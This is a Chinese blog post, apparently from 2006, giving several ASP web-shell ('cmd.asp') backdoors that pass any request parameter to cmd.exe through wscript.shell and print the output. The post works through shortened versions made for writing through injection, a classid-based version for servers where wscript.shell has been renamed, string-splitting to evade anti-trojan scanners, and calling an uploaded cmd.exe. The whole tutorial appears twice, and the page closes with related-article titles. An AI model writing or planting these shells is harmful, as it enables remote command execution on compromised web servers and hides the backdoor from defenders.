关于一句话木马
2006-05-04 22:29
363 查看
这里的asp后门不指像那些一句话木马、砍客、冰狐之类的b/s型的,只指像cmd.asp或2005a.asp的。
第一个,来看zzzeva免fso的cmd.asp
代码如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了?在注入时写有点不好写。那来改一下。
第二个,更改zzzeva免fso的cmd.asp
代码如下:
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request("cmd")).stdout.readall%>
用法是xx.asp?cmd=net user
这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个
第三个,缩短的cmd.asp
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request("cmd")).stdout.readall%>
这里用了response.write,变量用了cmd。为什么不更短呢?
第四个,更短的cmd.asp
<%=server.createobject("wscript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>
好像这就是最短的了。除了短,我们还要在别的地方下功夫。
第五个,wscript.shell被改名怎么办?
代码:
<ObjEct runat=sErvEr iD=kk scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>
当然,classid值在不同系统下有所不同。这个要自行更改
第六个,被一些杀asp木马的软件检测出来怎么办?
把变量拆开呀。代码:
<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>
或
<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>
这里代码引号里的东东都可以随便拆的,像还可以拆成
<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c
"&request("c")).stdout.readall%>
第7个,cmd.exe不让调用怎么办?
这个你自己上传一个cmd.exe,放在一个可以调用的目录下,代码更改如下:
<%=server.createobject("wscript.shell").exec("e:/aspx/cmD.EXE /c
"&request("c")).stdout.readall%>
第一个,来看zzzeva免fso的cmd.asp
代码如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了?在注入时写有点不好写。那来改一下。
第二个,更改zzzeva免fso的cmd.asp
代码如下:
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request("cmd")).stdout.readall%>
用法是xx.asp?cmd=net user
这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个
第三个,缩短的cmd.asp
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request("cmd")).stdout.readall%>
这里用了response.write,变量用了cmd。为什么不更短呢?
第四个,更短的cmd.asp
<%=server.createobject("wscript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>
好像这就是最短的了。除了短,我们还要在别的地方下功夫。
第五个,wscript.shell被改名怎么办?
代码:
<ObjEct runat=sErvEr iD=kk scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>
当然,classid值在不同系统下有所不同。这个要自行更改
第六个,被一些杀asp木马的软件检测出来怎么办?
把变量拆开呀。代码:
<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>
或
<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>
这里代码引号里的东东都可以随便拆的,像还可以拆成
<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c
"&request("c")).stdout.readall%>
第7个,cmd.exe不让调用怎么办?
这个你自己上传一个cmd.exe,放在一个可以调用的目录下,代码更改如下:
<%=server.createobject("wscript.shell").exec("e:/aspx/cmD.EXE /c
"&request("c")).stdout.readall%>
相关文章推荐
- 一种关于一句话木马的更新思想
- 一种关于一句话木马的更新思想
- 关于php一句话木马
- 关于PHP一句话木马
- 关于一款远控木马的简单分析
- 一句话木马连接客户端
- 《电脑报》评论:关于Linux,一句话,不要用
- 关于SQL企业管理器:作业中添加了一个叫x的作业的木马问题(转)
- 关于抓取帐号密码的木马程序尝试
- hackermi PHP 404 一句话木马
- 小谈关于网游木马是如何写的问题。
- 一句话木马,小马,大马,混淆一句话木马
- 窥探一句话木马后门的背后
- 关于剪贴板内不断出现“中国网络游戏木马外挂黑客技术大全.."的病毒分析
- 关于在C++开发的项目中引用后缀名为.c文件的一句话提醒
- 一句话木马入侵EASYNEWS新闻管理系统
- 关于木马的常见套路
- 安全普及:关于网络远程控制和木马的几点误区
- ECSHOP网站程序可以绕过权限上传一句话木马
- 全方面角度剖析一句话木马